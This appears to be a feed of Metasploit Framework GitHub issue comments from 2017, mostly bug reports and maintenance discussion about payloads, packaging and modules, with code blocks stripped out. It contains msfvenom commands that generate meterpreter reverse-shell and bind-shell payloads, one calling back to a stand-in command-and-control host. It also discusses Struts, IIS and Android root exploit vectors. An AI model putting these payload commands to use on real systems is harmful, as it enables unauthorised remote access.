[2017-03-20 21:47] OJ commented on #8133
This makes me sad.

[2017-03-21 02:44] nixawk commented on #8064
## Apache Struts S2-046

https://cwiki.apache.org/confluence/display/WW/S2-046

Keep hot.

[2017-03-21 02:46] busterb commented on #8133
Reproduced, and my RDP session literally turned upside down. I have a hunch that the issue is on the Windows meterpreter side. I tried the same transport with mettle and python meterpreter but didn't see the problem there, forwarding RDP to the same VM.

[2017-03-21 02:50] nixawk opened #8134 "Apache Struts2 S2-046"
Keep hot. ^_^

**Content-Disposition** is the key.

[code]

## References

1. https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723#
2. https://cwiki.apache.org/confluence/display/WW/S2-046
3. https://github.com/pwntester/S2-046-PoC

[2017-03-21 02:53] nixawk commented on #8064
https://github.com/rapid7/metasploit-framework/issues/8134

[2017-03-21 03:35] busterb commented on #8133
Looks like it starts with e5d0370a949d940e75e0b9fda078d2bcf5589ffb, though since we already had #7403 open, I suspect it just made the underlying problem of no sequence numbers on serialized channel data more evident. I think whether the problem shows up depends on how much data gets queued at the meterpreter level before it gets sent to metasploit.

[2017-03-21 07:34] AlkenePan commented on #8134
Content-Length 2097152 is enough

[2017-03-21 15:28] vsxen commented on #7036
sometimes   you may need apt upgrade

[2017-03-21 21:52] #8127 closed

[2017-03-21 22:21] jmartin-r7 opened #8140 "Previously build python meterpreter payload fails sysinfo"
## Steps to reproduce

using previously created python meterpreter (example was created with framework on 11-Jan-2017)
[code]

execute following:

[code]

## Expected behavior

Older python payload should be compatible with current framework instance

## Current behavior

sysinfo fails and sessions details are missing "Info" label, usually <user> @ <hostname>

## System stuff
Python 2.7.10 (system

[2017-03-22 09:46] UtilityDocket opened #8142 "Mac metasploit errors after update"
### This morning I updated metasploit and while it was working fine, after the update it started throwing this:

http://pastebin.com/raw/ZgKWUDKY

### Metasploit version
Latest as of today.
### OS
Mac - El Capitan

[2017-03-22 12:25] jbreed commented on #8122
@timwr I'd be interested in getting this refined.

When the phone locks up it continues to maintain the root shell? Upon reboot I imagine you lose the shell, but have you tried chaining this to something for persistence?

In the coming weeks I will see what I can find. My Samsung still shows an old patch level (even though it is updated) so this exploit still has validity. I imagine for older Andr

[2017-03-22 15:12] bwatters-r7 commented on #8140
Honestly, given some of the changes that @zeroSteiner made to the python meterpreter and msfconsole, it would not shock me to discover this might be broken.  I'll try and look closer later

[2017-03-22 18:51] zeroSteiner commented on #8140
@bwatters-r7 this appears to be due to commit [f1be7b2b](https://github.com/rapid7/metasploit-payloads/commit/f1be7b2b0b32b7997682b2790d8ba2acd1fecc2a) where the `get_system_arch` function was moved from the stdapi extension and into the meterpreter core. The stageless meterpreter that was generated on January does not include the stdapi extension or export that function, so when the session is op

[2017-03-22 19:08] itsmeroy2012 commented on #8075
Where is the file 'reverse_tcp.php'?? Are we supposed to write it?? @sempervictus

[2017-03-22 20:02] timwr commented on #8122
@jbreed if I remember correctly the shell still worked for a while after the phone locked up, but it eventually died (I think because certain core services were not starting), so persistence would definitely help here.
I suspect it's going to be increasingly hard to do depending on the version of Android. I think @freddierice and @jcadduono have some repositories that achieve this but I'm not sure

[2017-03-22 21:03] freddierice commented on #8122
Not very. However @hyln9 packaged it up a fairly portable version in https://github.com/hyln9/VIKIROOT.

[2017-03-23 00:32] busterb commented on #8075
Sorry man, question does not compute.

[2017-03-23 02:24] timwr commented on #8122
The vdso approach in VIKIROOT is perfect for 64bit phones, but not 32bit :(
@hyln9 can we borrow some of your code for the metasploit project? credit to you of course.
p.s In VIKIROOT I always get stuck on `Waiting for reverse connect shell`, but I'm sure it's fixable.

[2017-03-23 02:29] timwr commented on #8075
@itsmeroy2012 Do you mean: https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/php/reverse_tcp.rb ?

[2017-03-23 02:54] busterb commented on #8142
Hi. Do you have any idea what you upgraded from?

[2017-03-23 05:52] itsmeroy2012 commented on #8075
Apologies, I should have been more detailed. @timwr  @busterb
While studying the five files that @sempervictus  created here https://github.com/rapid7/metasploit-framework/pull/7669/files . There is one particular file metasploit-framework/modules/payloads/stagers/php/reverse_tcp_ssl.rb . Which is uploaded below. In that file check Line 39. It reads from another file reverse_tcp.php . I'm uploadin

[2017-03-23 07:00] UtilityDocket commented on #8142
Not sure what you mean by that question. Metasploit told me to update with msfupdate, which I did. Now it doesn't work.

[2017-03-23 17:55] freddierice commented on #8122
I'm pretty sure we could make this work for 32 bit phones as well. Looking at the linux source, linux/arch/arm/vdso implements gettimeofday. I'm not sure how many manufacturers have enabled 'CONFIG_VDSO' while configuring the kernel, but it's worth looking into.

[2017-03-23 18:10] busterb commented on #8142
I meant when was the last time you updated? 6 months ago? 2 weeks ago?

[2017-03-23 18:25] busterb commented on #8075
As mentioned in the first sentence of this issue "The original PR was based on an older layout of the Metasploit repository and no longer applies cleanly." In other words, that file has since been renamed and moved since the original PR. You can use git to dredge it up from history if you like (please don't ask me how, that's left as an exercise to the reader).

I suggest just looking at what the

[2017-03-23 20:13] jeffmcjunkin opened #8147 "msfvenom produces too many line continuations for VBA output"
## Steps to reproduce

How'd you do it?

1. Ran `msfvenom -p windows/meterpreter/reverse_https LHOST=command-and-control.deathstar.empire.invalid LPORT=443 EXITFUNC=thread -f vba` to get Excel macro.
2. Attempted to paste resulting text into Excel from Office 365 (latest version as far as I can tell).
3. Received error from Excel:

![image](https://cloud.githubusercontent.com/assets/1383363/242680

[2017-03-23 20:24] vysec commented on #8147
Just combine a few lines?

[2017-03-23 20:30] jeffmcjunkin commented on #8147
@vysec Yup, that's a workaround. Since even `windows/meterpreter/reverse_https` is only 27 lines when the maximum is 25, combining a few lines is fine.

I tracked down what was doing the conversion to `/opt/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-text-0.2.12/lib/rex/text/lang.rb`, which corresponds to https://github.com/rapid7/rex-text/blob/master/lib/rex/text/lang.rb. Line 128

[2017-03-23 20:55] vysec commented on #8147
Fair enough. I'm not sure many people use the code out of the box anyways. Most will modify it etc.

[2017-03-24 02:32] UtilityDocket commented on #8142
I last updated 2 days ago when I made this post.

[2017-03-24 10:43] busterb commented on #8142
Sorry, I'm miscommunicating.  Let me try asking another way: do you remember what version you were on _before_ you upgraded. You should be able to reset your database easily with 'msfdb reinit' but I'd like to be able to take a look at your ~/.msf4/db directory somehow.

The reason why I care about what the previous release you were on is, about 2 months ago we upgraded the package from postgresql

[2017-03-24 10:46] busterb commented on #8142
I'd suggest moving your old database out of the way with 'mv ~/.msf4/db ~/.msf4/db.bak` and then running 'msfdb reinit'. It looks like your database is corrupt, but it's hard, without more info, to guess why or to suggest a resolution. If there's nothing in there that you don't mind sharing, you could send us a tarball of the database to msfdev@metasploit.com for analysis.

[2017-03-24 14:08] 0sx commented on #8080
I guess you could check LC_ALL or LANG and if it's not a UTF-8 based locale warn the user.  I can try and have a look.

[2017-03-24 16:19] #8026 closed

[2017-03-24 16:27] rwhitcroft commented on #8147
@jeffmcjunkin it looks like you've done most of the leg work - feel like submitting a PR to fix?

[2017-03-24 16:36] jeffmcjunkin commented on #8147
@rwhitcroft I'm okay with submitting the dirty hack I proposed above, after some sanity checks.

What're some of the largest payloads? I'll set the line length to something that all of those payloads will work with.

[2017-03-24 18:19] spiffy111 opened #8150 "Merterpreter shell dies while using Armitage commands"
## Steps to reproduce
Run Armitage and compromise target using psexec with gui.

Once a meterpreter session has been established, right click on target, "Meterpreter #"

Navigate to "Interact", "Meterpreter Shell" and issue commands and/or navigate to "Explore", "Browse Files".

My meterpreter session immediatly dies after either action.

## How'd you do it?

Same as above.

Running Metasploit ver

[2017-03-25 14:02] hyln9 commented on #8122
@droidvoider
Well, I believe without another kernel exploit, dirtycow-based exploits need patched sepolicy to gain root plus unrestricted context for Android 6, so do VIKIROOT, which usually requires a unlocked bootloader.

@freddierice
As you can see, vdso for arm linux was added on 26 Mar 2015, maybe too late.

@timwr
Sure. Btw, since my code is currently licensed under GPLv3, I'd like to change

[2017-03-25 15:30] lmehai commented on #8064
Based on this recent  qualsys blog, removing fileupload interceptor is not enough.
As long as common-fileulpoad is in the war the vulnerability could be exploited.

https://blog.qualys.com/securitylabs/2017/03/14/apache-struts-cve-2017-5638-vulnerability-and-the-qualys-solution?utm_source=marketo&utm_medium=email&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=blog-apache-vuln-q

[2017-03-25 16:52] itsmeroy2012 commented on #8140
Has this been already fixed, because it doesn't cause any problem when I run it.  @jmartin-r7 @zeroSteiner

![screenshot from 2017-03-25 22-19-18](https://cloud.githubusercontent.com/assets/20739241/24324264/5893495e-11a9-11e7-919b-007578e3d5d1.png)

[2017-03-25 16:58] zeroSteiner commented on #8140
@itsmeroy2012 I don't believe it's been fixed yet. Based on your screenshot though, you're not experiencing the issue because you're using the staged version. In the staged version the meterpreter core and stdapi will both be the same version as your metasploit instance. This bug will surface when the meterpreter core is older than the version of stdapi that gets loaded.

To recreate this issue yo

[2017-03-25 18:54] itsmeroy2012 commented on #8140
I have somewhat fixed the issue but the file 'ext_server_stdapi.py' and 'meterpreter.py' doesn't seem to exist in the repository in github but only in my local directory. What am I supposed to do? @zeroSteiner

[2017-03-25 19:03] Kitt3120 opened #8153 "android/meterpreter/reverse_tcp not working on Nougat"
## Steps to reproduce

How'd you do it?

1. Create the payload apk file and uploaded it to my fileserver
2. Started the handler in background (All settings like payload and port are right)
3. Loaded the apk file onto my phone
4. Started it
5. The Meterpreter tries to handle the session but then fails (Reason: Died)

Everything is set up correctly. When I try it on my girlfriends phone (S4) with Lo

[2017-03-26 04:16] timwr commented on #8140
https://github.com/rapid7/metasploit-payloads/tree/master/python/meterpreter

[2017-03-26 04:40] timwr commented on #8153
Strange, is this reverse_tcp or reverse_http? Can you reproduce with both?

[2017-03-26 08:34] lukaszlenart commented on #8064
`jakarta-stream` parser is also vulnerable, the attack vector is a bit different - the best option, except migrating to the latest versions, is use one of those plugins:
https://github.com/apache/struts-extras

[2017-03-26 10:27] Kitt3120 commented on #8153
It was reverse_tcp. I will try Http, hopefully this will work. I will try at as soon as possible :)

[2017-03-26 18:09] void-in commented on #8150
@spiffy111 This looks like you will have to report it to @rsmudge on the Armitage forums. This is not the appropriate place to report since meterpreter works fine when used outside the Armitage. I am going to close this issue.

[2017-03-26 18:09] #8150 closed

[2017-03-27 08:09] opjoshi commented on #8064
Hello,

Can anyone let me know if we can use Pell Parser, would it be better or secure option ?

Also, kindly let me know if  any issues/vulnerabilities with exploits (Attack Vectors) available for the same.

Thanks.

[2017-03-27 08:20] 1m0r74l17y commented on #7036
i did apt upgrade, apt-get remove metasploit-framework, apt-get install metasploit-framework, apt-get install ruby, apt-get install openssl, cd /usr/share/metasploit-framework, bundle install, and it worked :)

[2017-03-27 12:53] busterb commented on #7036
If you have to do this, then Kali is messed up. Please raise it on their forums.

[2017-03-27 14:39] wchen-r7 commented on #8134
S2-045 has the same CVE (2017-5638) as S2-046. Do we want to create another module for this, or is it okay to close?

[2017-03-27 14:42] wchen-r7 commented on #8120
Just curious, were you actually hitting a Bavision camera web server?

[2017-03-27 16:11] nixawk commented on #8134
@wchen-r7 Please close it.

[2017-03-27 16:11] #8134 closed

[2017-03-28 01:42] nixawk opened #8160 "CVE-2017-7269 -- IIS RCE based on ScStoragePathFromUrl function in the WebDAV service"
## Description

- **Additional Information**:  the ScStoragePathFromUrl function is called twice

- **Vulnerability Type**:  Buffer overflow
- **Affected Product**:  Windows Server 2003 R2
- **Affected Component**:  ScStoragePathFromUrl
- **Attack Type**: Remote

## Code

[code]

## References

1. https://github.com/edwardz246003/IIS_exploit

[2017-03-28 03:23] thecarterb commented on #8160
I'd be happy to help with this if you want to collaborate on this :)

[2017-03-28 07:46] timwr commented on #8153
I can confirm this. So confused :/

[2017-03-28 13:56] busterb commented on #8153
is it a stager incompatibility? I've never looked closely at how these work, but I wonder if it's something to do with aarch64

[2017-03-28 14:29] FireFart opened #8161 "Issue with x86/alpha_upper"
Just found out that the x86/alpha_upper encoder spits out non alpha numeric characters. Do you know this problem?
[code]

[code]

[code]

[2017-03-28 14:29] karllll commented on #7225
I ran into this issue writing a https request to check for default passwords on EMC Axeda devices. A Net::HTTP object has a configurable 'ciphers' method - I was able to get beyond this issue by setting the ciphers option and excluding Diffie Hellman ciphers as described by Zack Hobson here ( https://zackhobson.com/2014/02/10/ssl_and_ruby_part_2/ ). Specifically, http.ciphers = ['AES128-SHA'].

[2017-03-28 14:35] karllll commented on #6783
One possible bypass is to set the Net::HTTP ciphers option, not including Diffie Hellman ciphers as described here ( https://zackhobson.com/2014/02/10/ssl_and_ruby_part_2/ ). I used http.ciphers = ['AES128-SHA'].

[2017-03-28 14:55] dmchell commented on #8160
Hey, here's a working MSF module for this... #8162

[2017-03-28 14:59] twinvega commented on #6783
Not a fix, but you could proxy your traffic through something like Burp which wouldn't have the issue.

[2017-03-28 15:44] egypt commented on #8161
Yes, this is a known issue. A pure alpha encoder is impossible without having a register that points at or near the shellcode -- those non-alpha bytes at the beginning are an fnstenv getpc stub the same as used in shikata_ga_nai. Add a BufferRegister=eax (or some other register) for full alpha.

[2017-03-28 16:03] FireFart commented on #8161
thx for clarification @egypt ! So maybe we should put this hint in the encoder description to avoid confusion?

[2017-03-28 16:12] egypt commented on #8161
@FireFart that's probably a good idea.

[2017-03-28 22:48] sn0wfa11 commented on #8035
Fixed by PR #8037

[2017-03-28 22:48] #8035 closed

[2017-03-29 04:01] timwr commented on #8153
I can reproduce on armv7 and aarch64. The socket is being killed (not sure why yet) before the first command completes, but after staging has completed.

[2017-03-29 04:36] timwr commented on #8153
For some reason reverting this: https://github.com/rapid7/metasploit-framework/pull/7993/files fixes it ¯\\\_(ツ)_/¯

[2017-03-29 04:38] busterb commented on #8153
Hmm, that seems to have been the same commit that made port forwarding with Windows meterpreter over reverse_tcp show packets out of order. This is weird.

[2017-03-29 06:38] timwr commented on #8153
I'm still baffled by this. Why Android 7.0 only?
@pbarry-r7 any ideas?

[2017-03-29 07:58] flibustier opened #8164 "DoubleAgent Injection and Persistance"
Hi guys !

Is [Double Agent](https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/) a good feature to add to metasploit ?

It sounds pretty impressive !

Thanks for attention

[2017-03-29 13:52] pbarry-r7 commented on #8153
Oof, not off the top of my head, @timwr.  :/  I tried to keep that commit simple/focused on just changing the packet-timeout logic to account for arriving, individual frames as proof that the connection is still valid and working.  But there could always be a bug, I'll review the code today.

[2017-03-29 16:44] wvu-r7 commented on #8164
http://www.leeholmes.com/blog/2017/03/27/tripleagent-even-zeroer-tay-code-injection-and-persistence-technique/

[2017-03-29 18:57] busterb commented on #8153
Theory, we don't actually process packets strictly in the order in which they are received. Also, apparently the handler might not always be associated with a packet right away, in which case they get requeued for a second go-round:

[code]

I think the change above modifies timing by creating some new objects to manage queued packets, which causes an already fragile system to fall down a bit more

[2017-03-29 19:38] wvu-r7 commented on #8125
No response from OP, so I'm closing this.

[2017-03-29 19:38] #8125 closed

[2017-03-29 19:40] wvu-r7 commented on #8161
@FireFart: Are you going to do it?

[2017-03-29 19:46] wvu-r7 commented on #8122
We are beyond the scope of OP's question. If Dirty COW development resumes, we'll create a new ticket. Thanks!

[2017-03-29 19:46] #8122 closed

[2017-03-29 19:53] #7467 closed

[2017-03-29 20:02] busterb commented on #8125
Note, when the 64-bit version of Metaploit Pro is released for Windows, the console command will be just a 'cmd.exe' window rather than the odd terminal emulator it ships with today. This should increase compatibility with modern versions of Windows.

[2017-03-29 20:10] busterb commented on #5863
I fixed a couple of things from this issue, grabbing.

[2017-03-29 20:11] busterb commented on #6334
Mettle has a reverse_http / reverse_https ability, just need to PR the payload bits into metasploit. I'm going to close this because that's on my todo list this week.

[2017-03-29 20:11] #6334 closed

[2017-03-29 20:12] busterb commented on #6504
Fixed here, thanks @OJ: https://github.com/rapid7/metasploit-framework/pull/7423

[2017-03-29 20:12] #6504 closed

[2017-03-29 20:14] busterb commented on #6652
Does https://github.com/rapid7/rex-text/pull/8 / https://github.com/rapid7/metasploit-framework/issues/8147 fix this?

I wonder if this would be a good newbie-friendly project.

[2017-03-29 20:22] busterb commented on #6967
Tried this, couldn't safely remove for other packaging reasons. You'll need to stick with local workarounds for now. Sorry about that!

[2017-03-29 20:22] #6967 closed

[2017-03-29 20:27] busterb commented on #5630
Closing in favor of https://github.com/rapid7/ruby_smb/issues/77 since that's where the new SMB hotness will go.

[2017-03-29 20:27] #5630 closed

[2017-03-29 20:29] busterb commented on #4879
I'm closing this one - we have a new SMB implementation in the works at https://github.com/rapid7/ruby_smb which will get to this.

[2017-03-29 20:29] #4879 closed

[2017-03-29 20:32] busterb commented on #4195
I'm looking forward to a PR that implements something here. In the mean time, closing.

[2017-03-29 20:32] #4195 closed

[2017-03-29 20:35] busterb commented on #4257
We're at 130 gems currently. I don't see that going down a ton. Just don't think this is really impactful to work on 3 years later - we have some bigger ideas for how to scale metasploit that are outlined in the 2017 roadmap in the wiki.

[2017-03-29 20:35] #4257 closed

[2017-03-29 20:37] busterb commented on #8060
Follow the breadcrumbs on #8061, this should be the same fix, agree with @adv16

[2017-03-29 20:38] busterb commented on #8105
This should be resolved now - poke me if it's not.

[2017-03-29 20:38] #8105 closed

[2017-03-29 20:42] busterb commented on #7013
We recently found the cause for this. It's Cylance!

Update the “Memory Actions” exclusion list (found in Device Policies) with *absolute file paths*. Directory paths are not sufficient - it needs the specific file path to the binaries/libraries that are being blocked.

For current omnibus installer, exclude these files:
[code]

[2017-03-29 20:42] #7013 closed

[2017-03-29 20:43] busterb commented on #6863
Gemset updated a month ago, we now have pcap-NG support. Who knew!? Thanks @todb and @claudijd

[2017-03-29 20:43] #6863 closed

[2017-03-29 20:44] pbarry-r7 commented on #8153
Good point, I do recall the recent discussion w.r.t. packet ordering.  I'm very open to discussion on approaches to fix (e.g. sequence each packet by number, dispatch packets 'up' by order of first-arrived-frame instead of first-completely received, other ideas...)  :)

[2017-03-29 20:44] busterb commented on #6796
Is this still an issue @psychomario ?

[2017-03-29 20:44] jinq102030 commented on #7854
The "res" in the invocation of function "plugin_search" is for HTTP request, ```'uri' => path,``` ,  in the definition of function "plugin_search", "res" is for a different HTTP request ```'uri' => "#{tpath}#{papp}",```.
I guess the author just wants to say the responses are different, but it looks a little odd to use their sizes as the criteria.

[2017-03-29 20:47] busterb commented on #6582
Added in https://github.com/rapid7/metasploit-framework/pull/8117

[2017-03-29 20:47] #6582 closed

[2017-03-29 20:52] busterb commented on #6053
We did this in PR #6625

[2017-03-29 20:52] #6053 closed

[2017-03-29 20:55] leebaird commented on #8062
Another example

resource (/root/master.rc)> use auxiliary/scanner/snmp/arris_dg950
[-] Auxiliary failed: SNMP::RequestTimeout host 10.40.13.126 not responding
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/snmp/manager.rb:241:in `get'
[-]   /usr/share/metasploit-framework/lib/snmp/manager.rb:262:in `get_value'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/snmp/arris_d

[2017-03-29 20:56] busterb commented on #4793
I'm thinking this has been fixed for a while, if I understand correctly.

[2017-03-29 20:56] #4793 closed

[2017-03-29 21:10] psychomario commented on #6796
It appears to be possible to use `req.uri_parts['QueryString']` to extract query params, so the above could be done. Very roughly:

`lib/msf/core/handler/reverse_http.rb`
[code]

and the payload generation will need to be redone appropriately.

Unfortunately I don't have time to implement this at the moment, so this issue can be closed if necessary.

[2017-03-30 11:53] h00die commented on #8062
I'm surprised https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/snmp/arris_dg950.rb#L140 didn't handle it correctly

[2017-03-30 11:56] busterb commented on #8140
It doesn't appear that there is a nice fix for this, that doesn't involve doing something gross to deal with an edge condition. Next time, we'll just either try to avoid introducing an incompatibility, or add a version indicator to indicate no backward compat (we have done that 2 times already, and will probably do it again this year).

[2017-03-30 11:56] #8140 closed

[2017-03-30 14:59] pbarry-r7 commented on #7903
From perusing the web and the OpenVAS svn repo, it does appear the XML format changed.  I think we can update the db_import code to check the **\<report format_id="XXX"\>** value and parse based on that, will pull the thread...

[2017-03-30 18:07] FireFart commented on #8161
@wvu-r7 done: https://github.com/rapid7/metasploit-framework/pull/8168 (I stole most of @egypt 's text :) )

[2017-03-30 20:11] #8147 closed

[2017-03-30 20:15] pbarry-r7 commented on #7434
My apologies for letting this slip.  Fix looks good!

[code]

Also verified via the UI that the scan was correctly created with the 10.10.12.13 target.  Thanks, @bcook-r7!

[2017-03-30 20:15] #7434 closed

[2017-03-30 20:44] Kitt3120 commented on #8153
Hey! Sorry for not answering for the past days. I will be online more often at the weekend again.

[2017-03-30 22:16] busterb commented on #4776
I think people had more fun fantasizing about how to implement it and nobody did. I'm marking this newbie friendly because I don't think it's really that complex.

[2017-03-30 22:19] sempervictus commented on #4776
Iirc, kernelsmith had lots of fun with console formatting a few years back. There some strange idiosyncrasies afoot in this area, or were anyway back then.

Still, no danger is anyone and everyone hacking on it - we will know right quick if things break at this tier.

[2017-03-31 02:25] timwr commented on #8153
@Kitt3120 don't worry about it, thanks for reporting.
I'm still confused as to why this only affects Nougat (and only Android).

Also (stupid question perhaps) shouldn't tcp ensure the packets arrive in the correct order?

[2017-03-31 09:11] Kalaratri opened #8170 "db_import fails to import Nikto XML"
## Steps to reproduce

I created a Nikto XML file from scan, then used db_import, but it fails:

## Current behavior
b_import lab_nikto_http.xml
[*] Importing 'Nikto XML' data
[-] Failed to import /mnt/hgfs/KaliShare/pwk_exercises/14.2.3/lab_nikto_http.xml due to malformed XML:
[-] REXML::ParseException: No close tag for /niktoscan/niktoscan/niktoscan/niktoscan/niktoscan/niktoscan/niktoscan/niktos

[2017-03-31 14:03] pbarry-r7 commented on #8170
Hmm, at an initial blush, sounds like the XML is missing a tag:

[code]

Could you try validating the XML with another program?  If you don't have something installed, you can try something like https://www.samltool.com/prettyprint.php (paste your XML in, press the "turn pretty" button), and if it's valid XML, you'll see it show up pretty-printed at the bottom of the page.  If it's not valid, you'

[2017-03-31 14:16] Kalaratri commented on #8170
Hi, thanks, for user I get a ERROR WHEN LOADING THE XML when trying the above, so it looks like Nikto isn't outputting XML as expected...

[2017-03-31 14:24] Kitt3120 commented on #8153
I think that's one thing tcp should do. Hopefully it does. I will test the bind_tcp later.

[2017-03-31 15:49] pbarry-r7 commented on #8170
Thanks for the follow up.  I'm going to close this issue for now, but please reopen if you do encounter a scenario where the Nikto XML output passes validation but fails msfconsole's **db_import**  command.

[2017-03-31 15:49] #8170 closed

[2017-03-31 15:50] busterb opened #8171 "teach db_nmap how to escalate privs for nmap on its own"
Often to get decent results from nmap, you need to run it with escalated privileges. On the other hand, I don't like running metasploit as 'root'. So, I'd like to teach metasploit how to call 'sudo' or 'doas' in front of db_nmap invocations so that only nmap needs to run as root.

This can be worked around by just running nmap independently and then importing the XML, but where's the fun in that?

[2017-03-31 16:21] pbarry-r7 commented on #8153
Y'all are right about TCP, @timwr and @Kitt3120.  My expectation is that TCP is "doing the right thing" for us w.r.t. managing missing and out-of-order frames when they happen on the connection between Meterpreter and MSF.  I believe the issue is (and @bcook-r7 can correct me if I'm off here) above the transport layer, that MSF's code for receiving packets has an opportunity to "dispatch" complete

[2017-03-31 16:38] pbarry-r7 commented on #8161
Merged!  🎉

[2017-03-31 16:38] #8161 closed

[2017-04-01 09:15] #8160 closed

[2017-04-02 03:17] wvu-r7 commented on #8171
Interesting idea. Or you can `chmod u+s` Nmap and then exploit it with `exploit/unix/local/setuid_nmap`. :P

[2017-04-02 03:20] busterb commented on #8171
wow, dual purpose even. thanks @wvu-r7

[2017-04-02 12:32] itsmeroy2012 commented on #7133
Documentation for this module is already present,check https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md

@wchen-r7

[2017-04-02 13:21] h00die commented on #7133
Believe I wrote those

[2017-04-02 13:21] #7133 closed

[2017-04-03 07:37] wvu-r7 commented on #6208
I decided to move forward with this, since it's been bugging me lately. Thanks for your time toward debugging this, @jhart-r7 && @jlmurray. Until https://github.com/robertdavidgraham/masscan/pull/199 lands, we're going with a stopgap fix.

[2017-04-03 13:32] anthraxx commented on #8105
@busterb
When I try to bundle it i get
[code]

Is it safe to just purge ```metasploit-aggregator``` from the Gemfile.lock, or what is the best option in your opinion?

[2017-04-03 13:42] busterb commented on #8105
If you modify Gemfile, or gemspec, you need to update Gemfile.lock yourself.

Here's how we handled it in the omnibus packager:
https://github.com/rapid7/metasploit-omnibus/commit/e61b52c512ed082f108b8554d28c8abefcf089b0

We do bundle install, which writes a new Gemfile.lock, then we include the updated file in our package.

[2017-04-03 13:46] anthraxx commented on #8105
sure, but i didn't modify it, i just take it as is in the release tarball. I assume maybe because of the conditional stuff in the Gemfile?

[2017-04-03 13:53] busterb commented on #8105
Exactly, it's the conditional stuff in the Gemfile that is causing the modification.

Just package the modified Gemfile.lock that gets generated and it should work fine.

[2017-04-03 18:40] itsmeroy2012 commented on #7134
Module documentation has already been done @wchen-r7

[2017-04-03 18:41] itsmeroy2012 commented on #7138
Module documentation has been done. @wchen-r7

[2017-04-03 21:21] #7134 closed

[2017-04-03 21:22] #7138 closed

[2017-04-04 01:46] LuYuChengProject opened #8183 "How to use msfvenom -k operation and -c operation ?"
Hi guys .  I don't know how to use the -k and -c operation . When i use this operation i can not say anything . Is anybody explain this operation ?Thanks (●'◡'●)

[2017-04-04 02:27] busterb commented on #8183
Sorry @LuYuChengProject , this is not a support channel. Try community.rapid7.com

[2017-04-04 02:27] #8183 closed

[2017-04-04 08:48] #6208 closed

[2017-04-04 11:36] Sami-G opened #8187 "Can anybody how to do port forwarding on cellular network"
## Steps to reproduce

How'd you do it?

1. ...Can anybody how to do port forwarding on cellular  network
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

What happens instead?

Yo

[2017-04-04 11:36] #8187 closed

[2017-04-05 12:00] ayoubbtt commented on #7226
it does not work
i get this error :
error: running command load: loaderror cannot load such file --rex/post/meterpreter/extensions/android/android

[2017-04-05 12:02] busterb commented on #7226
Since this issue was raised, we got rid of the extension altogether. In other words, there's no need to run 'load android' at all (I'm assuming that's what you typed, since that part is edited out above).

[2017-04-05 15:28] mlnlover11 opened #8191 "Cannot create exe-service from msfvenom"
## Steps to reproduce

Using msfvenom to create an exe-service fails.

By executing:
 `msfvenom -p windows/meterpreter/bind_tcp -f exe-service LPORT=16103 -o /tmp/service.exe`
it should create a Windows Service executable binary. Instead, it fails with the error:
`Error: no implicit conversion of nil into String`

## Expected behavior

Should output `Saved as: /tmp/service.exe`

## Current behavio

[2017-04-05 15:54] wvu-r7 commented on #8191
If you have a fix, why not PR it?

[2017-04-05 16:57] mlnlover11 commented on #8191
I hadn't created a pull request because I wasn't sure about the policy on small changes like this for PRs vs. issues (especially while following the [Contributing guide](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md)).

[2017-04-05 18:18] wvu-r7 commented on #8191
No, it's totally fine! In fact, it's very much appreciated. :)

[2017-04-05 20:02] KINGSABRI opened #8196 "Build Metasploit nightly builds as Linux snap"
Hello guys,
As we know, Metasploit community is doing great effort to contribute, maintain and package metasploit nightly builds.

As [snap](https://snapcraft.io) project come, it makes our life much easier since we can use metasploit without any missing gems, with configure database(maybe), with an easy update, and unified build. No deb, rpm packaging, just push it to snap store.

I believe it mu

[2017-04-05 21:02] FireFart commented on #7921
@wvu-r7 i created a possible fix here: https://github.com/rapid7/metasploit-framework/pull/8197

[2017-04-05 21:20] #8191 closed

[2017-04-06 03:23] Techscq opened #8198 "missing shell comands android. Help pls"
there cant use cp, pull, push, sh an others commands,¿ we need make it by our self like a script? or anyone know how to get acces to these commands?

also i was getting time issue on reverse_https payloads some connections die after 10 mins sometimes less is for a android device fault?

im using Payload android/meterpreter/reverse_https and multi handler

PD: My english is poor but i hope make sen

[2017-04-06 03:59] OJ opened #8199 "Modify extapi to check for dependencies"
As per the discussion on https://github.com/rapid7/mettle/pull/70 we should have support in the `extapi` extension loading to check dependencies for the underlying functions. This is required to stop commands appearing in the Meterpreter menu that aren't actually supported by the underlying session.

[2017-04-06 09:48] nixawk opened #8200 "[Request] Pubprn Command Delivery Server"
## Steps to reproduce

How'd you do it?

1. create a file called **hi.png**

[code]

2. Execute the code from remote png file.

[code]

If everything goes well,  It will pop a calc window.

![exploit](https://cloud.githubusercontent.com/assets/7352479/24748082/2ea6d33e-1a84-11e7-8b8d-a7ad74966ea1.jpg)

<img width="681" alt="screen shot 2017-04-06 at 04 34 02" src="https://cloud.githubusercontent.c

[2017-04-06 16:03] itsmeroy2012 commented on #7132
Docs have been submitted, the issue can be closed @h00die @wchen-r7

[2017-04-06 16:05] itsmeroy2012 commented on #7131
Docs have been merged for this module. @h00die  @wchen-r7

[2017-04-06 16:06] busterb commented on #7131
In the future, if you put 'fixes #7131' in your PR description, it will automatically close the issue.

[2017-04-06 16:06] #7131 closed

[2017-04-06 16:06] busterb commented on #7132
For the next one, put 'fixes #7132' to automatically close.

[2017-04-06 16:06] #7132 closed

[2017-04-06 16:07] itsmeroy2012 commented on #7131
Will do that for sure. @busterb

[2017-04-06 16:10] itsmeroy2012 commented on #7130
Docs have been uploaded and merged. @h00die @wchen-r7

[2017-04-06 16:14] busterb commented on #7130
Sure, I'll close. Thanks @itsmeroy2012

[2017-04-06 16:14] #7130 closed

[2017-04-06 16:36] BorjaMerino opened #8202 "file? method from Msf::Post::File module returns "false" with a big file"
## Steps to reproduce

How'd you do it?

1. Gain a meterpreter on a Windows machine with a windows/meterpreter/reverse_tcp
2. Try to check if a big file (for instance 5 GB) exists by using the file? method from Msf::Post::File

